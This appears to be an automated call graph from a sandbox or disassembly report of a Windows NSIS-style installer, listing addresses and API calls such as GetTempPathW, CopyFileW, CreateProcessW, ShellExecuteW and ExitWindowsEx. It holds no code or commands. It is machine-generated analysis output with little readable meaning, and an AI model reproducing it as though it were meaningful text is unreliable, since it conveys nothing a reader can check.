406293 lstrcatW 4930->4933 4931->4930 4931->4931 4932->4927 4933->4932 4934 402082 4935 401446 18 API calls 4934->4935 4936 402093 SetWindowLongW 4935->4936 4937 4030e3 4936->4937 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4938 402a84 4939 401553 19 API calls 4938->4939 4940 402a8e 4939->4940 4941 401446 18 API calls 4940->4941 4942 402a98 4941->4942 4943 401a13 4942->4943 4944 402ab2 RegEnumKeyW 4942->4944 4945 402abe RegEnumValueW 4942->4945 4946 402a7e 4944->4946 4945->4943 4945->4946 4946->4943 4947 4029e4 RegCloseKey 4946->4947 4947->4943 4948 402c8a 4949 402ca2 4948->4949 4950 402c8f 4948->4950 4952 40145c 18 API calls 4949->4952 4951 401446 18 API calls 4950->4951 4954 402c97 4951->4954 4953 402ca9 lstrlenW 4952->4953 4953->4954 4955 402ccb WriteFile 4954->4955 4956 401a13 4954->4956 4955->4956 4957 40400d 4958 40406a 4957->4958 4959 40401a lstrcpynA lstrlenA 4957->4959 4959->4958 4960 40404b 4959->4960 4960->4958 4961 404057 GlobalFree 4960->4961 4961->4958 4962 401d8e 4963 40145c 18 API calls 4962->4963 4964 401d95 ExpandEnvironmentStringsW 4963->4964 4965 401da8 4964->4965 4967 401db9 4964->4967 4966 401dad lstrcmpW 4965->4966 4965->4967 4966->4967 4968 401e0f 4969 401446 18 API calls 4968->4969 4970 401e17 4969->4970 4971 401446 18 API calls 4970->4971 4972 401e21 4971->4972 4973 4030e3 4972->4973 4975 405f51 wsprintfW 4972->4975 4975->4973 4976 402392 4977 40145c 18 API calls 4976->4977 4978 402399 4977->4978 4981 4071f8 4978->4981 4982 406ed2 25 API calls 4981->4982 4983 407218 4982->4983 4984 407222 lstrcpynW lstrcmpW 4983->4984 4985 4023a7 4983->4985 4986 407254 4984->4986 4987 40725a lstrcpynW 4984->4987 4986->4987 4987->4985 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4132 401a1f 4133 40145c 18 API calls 4132->4133 4134 401a26 4133->4134 4135 4062a3 11 API calls 4134->4135 4136 401a49 4135->4136 4137 401a64 4136->4137 4138 401a5c 4136->4138 4186 406009 lstrcpynW 4137->4186 4185 406009 lstrcpynW 4138->4185 4141 401a62 4145 406038 5 API calls 4141->4145 4142 401a6f 4143 406722 3 API calls 4142->4143 4144 401a75 lstrcatW 4143->4144 4144->4141 4147 401a81 4145->4147 4146 4062d5 2 API calls 4146->4147 4147->4146 4148 405e30 2 API calls 4147->4148 4150 401a98 CompareFileTime 4147->4150 4151 401ba9 4147->4151 4155 4062a3 11 API calls 4147->4155 4159 406009 lstrcpynW 4147->4159 4165 406805 18 API calls 4147->4165 4172 405ca0 MessageBoxIndirectW 4147->4172 4176 401b50 4147->4176 4183 401b5d 4147->4183 4184 405e50 GetFileAttributesW CreateFileW 4147->4184 4148->4147 4150->4147 4152 404f72 25 API calls 4151->4152 4154 401bb3 4152->4154 4153 404f72 25 API calls 4156 401b70 4153->4156 4157 40337f 37 API calls 4154->4157 4155->4147 4160 4062a3 11 API calls 4156->4160 4158 401bc6 4157->4158 4161 4062a3 11 API calls 4158->4161 4159->4147 4167 401b8b 4160->4167 4162 401bda 4161->4162 4163 401be9 SetFileTime 4162->4163 4164 401bf8 FindCloseChangeNotification 4162->4164 4163->4164 4166 401c09 4164->4166 4164->4167 4165->4147 4168 401c21 4166->4168 4169 401c0e 4166->4169 4171 406805 18 API calls 4168->4171 4170 406805 18 API calls 4169->4170 4173 401c16 lstrcatW 4170->4173 4174 401c29 4171->4174 4172->4147 4173->4174 4175 4062a3 11 API calls 4174->4175 4177 401c34 4175->4177 4178 401b93 4176->4178 4179 401b53 4176->4179 4180 405ca0 MessageBoxIndirectW 4177->4180 4181 4062a3 11 API calls 4178->4181 4182 4062a3 11 API calls 4179->4182 4180->4167 4181->4167 4182->4183 4183->4153 4184->4147 4185->4141 4186->4142 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4078 4021b5 4079 40145c 18 API calls 4078->4079 4080 4021bb 4079->4080 4081 40145c 18 API calls 4080->4081 4082 4021c4 4081->4082 4083 40145c 18 API calls 4082->4083 4084 4021cd 4083->4084 4085 40145c 18 API calls 4084->4085 4086 4021d6 4085->4086 4087 404f72 25 API calls 4086->4087 4088 4021e2 ShellExecuteW 4087->4088 4089 40221b 4088->4089 4090 40220d 4088->4090 4092 4062a3 11 API calls 4089->4092 